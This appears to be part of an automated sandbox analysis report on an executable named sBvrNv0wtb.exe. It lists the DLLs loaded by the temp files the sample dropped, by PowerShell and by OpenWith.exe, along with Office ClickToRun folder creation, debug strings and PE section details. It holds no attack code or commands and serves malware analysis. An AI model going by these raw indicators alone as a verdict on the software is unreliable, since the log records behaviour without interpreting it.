    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windows.ui.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: inputhost.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: netprofm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: npmproxy.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: webservices.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windows.networking.connectivity.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: windows.security.authentication.onlineid.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: cryptnet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: devrtl.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: msxml6.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: pdh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\UpdatesJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45AJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l1-2-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l2-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-localization-l1-2-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-synch-l1-2-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-xstate-l2-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
    Source: sBvrNv0wtb.exe, Static PE information: certificate valid
    Source: sBvrNv0wtb.exe, Static PE information: Image base 0x140000000 > 0x60000000
    Source: sBvrNv0wtb.exe, Static file information: File size 6987352 > 1048576
    Source: sBvrNv0wtb.exe, Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x5b5e00
    Source: sBvrNv0wtb.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053954532.00000248C2BFB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\en-us\SetupBootstrapper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\en-us\SetupBootstrapper.pdb source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053954532.00000248C2BFB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rekk.pdb source: sBvrNv0wtb.exe, 00000000.00000003.1313913322.000001972756D000.00000004.00000020.00020000.00000000.sdmp, sBvrNv0wtb.exe, 00000000.00000003.1347329405.000001972797A000.00000004.00000020.00020000.00000000.sdmp, 918D.tmp, 00000004.00000000.1346823200.00007FF7A9234000.00000002.00000001.01000000.00000006.sdmp
    Source: InspectorOfficeGadget.exe.6.dr Static PE information: 0xABDA5564 [Fri May 13 12:24:04 2061 UTC]
    Source: initial sample Static PE information: section where entry point is pointing to: .hexpthk
    Source: sBvrNv0wtb.exe Static PE information: section name: .xdata
    Source: 872C.tmp.0.dr Static PE information: section name: .fptable
    Source: 918D.tmp.0.dr Static PE information: section name: .xdata
    Source: C2RUI.dll.6.dr Static PE information: section name: .didat
    Source: IntegratedOffice.exe.6.dr Static PE information: section name: .didat
    Source: IntegratedOffice.exe.6.dr Static PE information: section name: .fptable
    Source: inventory.dll.6.dr Static PE information: section name: .didat
    Source: inventory.dll.6.dr Static PE information: section name: .detourc
    Source: manageability.dll.6.dr Static PE information: section name: .didat
    Source: MavInject32.exe.6.dr Static PE information: section name: .detourc
    Source: msix.dll.6.dr Static PE information: section name: .didat
    Source: msix.dll.6.dr Static PE information: section name: .fptable
    Source: OfficeC2RClient.exe.6.dr Static PE information: section name: .didat
    Source: OfficeC2RClient.exe.6.dr Static PE information: section name: .detourc
    Source: OfficeC2RCom.dll.6.dr Static PE information: section name: .didat
    Source: OfficeC2RCom.dll.6.dr Static PE information: section name: .fptable
    Source: OfficeClickToRun.exe.6.dr Static PE information: section name: .didat
    Source: officeinventory.dll.6.dr Static PE information: section name: _RDATA
    Source: OfficeOEMPlugin.dll.6.dr Static PE information: section name: .didat
    Source: officesvcmgr.exe.6.dr Static PE information: section name: .didat
    Source: policy.dll.6.dr Static PE information: section name: .didat
    Source: repoman.dll.6.dr Static PE information: section name: .didat
    Source: repoman.dll.6.dr Static PE information: section name: .fptable
    Source: vcruntime140.dll.6.dr Static PE information: section name: fothk
    Source: vcruntime140.dll.6.dr Static PE information: section name: _RDATA
    Source: ApiClient.dll.6.dr Static PE information: section name: .fptable
    Source: AppVCatalog.dll.6.dr Static PE information: section name: .didat
    Source: appvcleaner.exe.6.dr Static PE information: section name: .didat
    Source: AppVIntegration.dll.6.dr Static PE information: section name: .didat
    Source: AppVIsvApi.dll.6.dr Static PE information: section name: .didat
    Source: AppVIsvStreamingManager.dll.6.dr Static PE information: section name: .didat
    Source: AppVIsvSubsystemController.dll.6.dr Static PE information: section name: .didat
    Source: AppVIsvSubsystemController.dll.6.dr Static PE information: section name: .detourc
    Source: AppVIsvSubsystemController.dll.6.dr Static PE information: section name: .mrdata
    Source: AppvIsvSubsystems32.dll.6.dr Static PE information: section name: .mrdata
    Source: AppvIsvSubsystems32.dll.6.dr Static PE information: section name: .detourd
    Source: AppvIsvSubsystems32.dll.6.dr Static PE information: section name: .detourc
    Source: AppvIsvSubsystems32.dll.6.dr Static PE information: section name: .c2r
    Source: AppvIsvSubsystems64.dll.6.dr Static PE information: section name: .didat
    Source: AppvIsvSubsystems64.dll.6.dr Static PE information: section name: .detourc
    Source: AppvIsvSubsystems64.dll.6.dr Static PE information: section name: .mrdata
    Source: AppvIsvSubsystems64.dll.6.dr Static PE information: section name: .detourd
    Source: AppvIsvSubsystems64.dll.6.dr Static PE information: section name: .c2r
    Source: AppvIsvSubsystems64_arm64x.dll.6.dr Static PE information: section name: .hexpthk
    Source: AppvIsvSubsystems64_arm64x.dll.6.dr Static PE information: section name: .didat
    Source: AppvIsvSubsystems64_arm64x.dll.6.dr Static PE information: section name: .detourc
    Source: AppvIsvSubsystems64_arm64x.dll.6.dr Static PE information: section name: .mrdata
    Source: AppvIsvSubsystems64_arm64x.dll.6.dr Static PE information: section name: .detourd
    Source: AppvIsvSubsystems64_arm64x.dll.6.dr Static PE information: section name: .a64xrm
    Source: AppvIsvSubsystems64_arm64x.dll.6.dr Static PE information: section name: .c2r
    Source: AppVIsvVirtualization.dll.6.dr Static PE information: section name: .didat
    Source: AppVOrchestration.dll.6.dr Static PE information: section name: .didat
    Source: AppVScripting.dll.6.dr Static PE information: section name: .didat
    Source: AppVShNotify.exe.6.dr Static PE information: section name: .didat
    Source: C2R32.dll.6.dr Static PE information: section name: .fptable
    Source: C2R32.dll.6.dr Static PE information: section name: .detourc
    Source: c2r32werhandler.dll.6.dr Static PE information: section name: .fptable
    Source: C2R64.dll.6.dr Static PE information: section name: .didat
    Source: C2R64.dll.6.dr Static PE information: section name: .fptable
